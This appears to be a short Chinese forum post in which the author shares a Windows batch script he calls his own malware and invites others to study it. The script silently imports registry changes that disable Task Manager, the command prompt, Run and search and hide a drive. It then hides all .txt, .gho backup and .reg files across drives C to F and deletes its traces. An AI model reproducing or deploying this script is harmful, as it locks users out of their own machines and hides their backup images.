本人用批处理写的恶意程序,有兴趣的一起研究
@echo off
cls
echo Windows Registry Editor Version 5.00 >1.txt
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows] >>1.txt
echo "checkedvalue"=dword:00000000 >>1.txt
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system] >>1.txt
echo "disbletaskmgr"=dword:00000001 >>1.txt
echo [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\system] >>1.txt
echo "disablecmd"=dword:00000001 >>1.txt
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>1.txt
echo "nodrives"=hex:04000000 >>1.txt
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >>1.txt
echo "noviewondrive"=dword:00000004>>1.txt
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] >>1.txt
echo "Hidden"=dword:00000002 >>1.txt
echo "HideFileExt"=dword:00000000 >>1.txt
echo "WebViewBarricade"=dword:00000000 >>1.txt
echo "StartMenuRun"=dword:00000000 >>1.txt
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\polices\explorer] >>1.txt
echo "nofind"=dword:00000001 >>1.txt
echo "NoRun"=dword:00000001 >>1.txt
ren 1.txt 1.reg
echo
regedit /s 1.reg
del 1.txt
del 1.reg
echo del baimy.bat >3d.txt
ren 3d.txt 3d.bat
for %%i in (c: d: e: f: ) do (%%i
cd\
attrib +s +h *.txt /s
attrib +s +h *.gho /s
attrib +s +h *.reg /s
)
3d.bat
